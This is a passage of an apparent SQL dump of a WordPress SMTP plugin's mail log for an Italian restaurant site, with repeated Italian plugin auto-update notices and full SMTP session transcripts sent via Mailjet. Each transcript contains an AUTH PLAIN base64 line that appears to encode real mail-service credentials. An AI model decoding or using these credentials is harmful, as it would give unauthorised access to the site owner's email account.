plugin sono stati aggiornati automaticamente'),(58694,4631,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Yoast SEO (da versione 15.9 a 15.9.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58695,4631,'original_headers',''),(58696,4631,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <56e996bf3ba5d1c8515d38fa1fe7fcca@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 04 Mar 2021 16:52:09 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Yoast SEO (da versione 15.9=\r\n a 15.9.1)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di ai=\r\nuto, i volontari dei forum di supporto su https://it.wordpress.org/forum=\r\ns/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/foru=\r\nms/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as f126b057-c56d-49b8-bf88-27cbfd7164a3\r\n'),(58697,4632,'solution','All good, mail sent.'),(58698,4632,'success','1'),(58699,4632,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58700,4632,'to_header','webmaster@baldisserri.com'),(58701,4632,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58702,4632,'original_to','webmaster@baldisserri.com'),(58703,4632,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58704,4632,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.3.18 a 2.4.0)\n- Really Simple SSL (da versione 4.0.9 a 4.0.10)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58705,4632,'original_headers',''),(58706,4632,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <9341e9da701f21cd949f38a8f3f109fa@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Mon, 08 Mar 2021 14:05:56 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Cookie and Consent Solution=\r\n for the GDPR &amp; ePrivacy (da versione 2.3.18 a 2.4.0)=0A- Really Sim=\r\nple SSL (da versione 4.0.9 a 4.0.10)=0A=0A=0ASe hai problemi di qualsias=\r\ni tipo o hai bisogno di aiuto, i volontari dei forum di supporto su http=\r\ns://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.=\r\nwordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as a821ef2e-7081-497e-842e-dd42d7011c5c\r\n'),(58707,4633,'solution','All good, mail sent.'),(58708,4633,'success','1'),(58709,4633,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58710,4633,'to_header','webmaster@baldisserri.com'),(58711,4633,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58712,4633,'original_to','webmaster@baldisserri.com'),(58713,4633,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58714,4633,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.10 a 4.0.11)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58715,4633,'original_headers',''),(58716,4633,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <0e94c81dffe1fb0b7a7256fee4f44d9d@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 09 Mar 2021 12:49:51 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Really Simple SSL (da versio=\r\nne 4.0.10 a 4.0.11)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai biso=\r\ngno di aiuto, i volontari dei forum di supporto su https://it.wordpress.=\r\norg/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/sup=\r\nport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 172eae71-6979-4447-a58a-fcaad615ffd8\r\n'),(58717,4634,'solution','All good, mail sent.'),(58718,4634,'success','1'),(58719,4634,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58720,4634,'to_header','webmaster@baldisserri.com'),(58721,4634,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58722,4634,'original_to','webmaster@baldisserri.com'),(58723,4634,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58724,4634,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.76 a 3.77)\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.47 a 1.16.48)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58725,4634,'original_headers',''),(58726,4634,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <10e16838269fed711a87657510010ea3@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 10 Mar 2021 00:26:22 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Popup Builder (da versione 3=\r\n..76 a 3.77)=0A- UpdraftPlus - Backup/Ripristino (da versione 1.16.47 a 1=\r\n..16.48)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiuto=\r\n, i volontari dei forum di supporto su https://it.wordpress.org/forums/=\r\n possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums=\r\n/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 7b59c25c-7d71-4a77-93d7-911447854184\r\n'),(58727,4635,'solution','All good, mail sent.'),(58728,4635,'success','1'),(58729,4635,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58730,4635,'to_header','webmaster@baldisserri.com'),(58731,4635,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58732,4635,'original_to','webmaster@baldisserri.com'),(58733,4635,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58734,4635,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Content Views (da versione 2.3.4 a 2.4.0)\n- Popup Builder (da versione 3.77 a 3.78)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58735,4635,'original_headers',''),(58736,4635,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <6dda529c5220c2ffe3eea054a2563256@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 10 Mar 2021 18:16:53 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Content Views (da versione 2=\r\n..3.4 a 2.4.0)=0A- Popup Builder (da versione 3.77 a 3.78)=0A=0A=0ASe hai=\r\n problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei foru=\r\nm di supporto su https://it.wordpress.org/forums/ possono riuscire ad ai=\r\nutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordP=\r\nress\r\n.\r\n250 OK queued as 740e96d0-b2d8-4734-8879-e43952294f63\r\n'),(58737,4636,'solution','All good, mail sent.'),(58738,4636,'success','1'),(58739,4636,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58740,4636,'to_header','webmaster@baldisserri.com'),(58741,4636,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58742,4636,'original_to','webmaster@baldisserri.com'),(58743,4636,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58744,4636,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Content Views (da versione 2.4.0 a 2.4.0.1)\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.48 a 1.16.49)\n- Yoast SEO (da versione 15.9.1 a 15.9.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58745,4636,'original_headers',''),(58746,4636,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <6957265389237e381ca5882618cbbed7@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 11 Mar 2021 13:41:57 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Content Views (da versione 2=\r\n..4.0 a 2.4.0.1)=0A- UpdraftPlus - Backup/Ripristino (da versione 1.16.48=\r\n a 1.16.49)=0A- Yoast SEO (da versione 15.9.1 a 15.9.2)=0A=0A=0ASe hai p=\r\nroblemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum=\r\n di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiu=\r\ntarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordPr=\r\ness\r\n.\r\n250 OK queued as 6f24ec18-c3b5-4868-b5e0-b331572a3b85\r\n'),(58747,4637,'solution','All good, mail sent.'),(58748,4637,'success','1'),(58749,4637,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58750,4637,'to_header','webmaster@baldisserri.com'),(58751,4637,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58752,4637,'original_to','webmaster@baldisserri.com'),(58753,4637,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58754,4637,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.0 a 2.4.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58755,4637,'original_headers',''),(58756,4637,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <04f5d431da1be68d103fe7301450d0f4@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Sat, 13 Mar 2021 01:21:02 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Cookie and Consent Solution=\r\n for the GDPR &amp; ePrivacy (da versione 2.4.0 a 2.4.1)=0A=0A=0ASe hai=\r\n problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei foru=\r\nm di supporto su https://it.wordpress.org/forums/ possono riuscire ad ai=\r\nutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordP=\r\nress\r\n.\r\n250 OK queued as a770d210-1c1e-4121-ad9d-c4b4be88a77b\r\n'),(58757,4638,'solution','All good, mail sent.'),(58758,4638,'success','1'),(58759,4638,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58760,4638,'to_header','webmaster@baldisserri.com'),(58761,4638,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58762,4638,'original_to','webmaster@baldisserri.com'),(58763,4638,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58764,4638,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- WP Fastest Cache (da versione 0.9.1.5 a 0.9.1.6)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58765,4638,'original_headers',''),(58766,4638,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 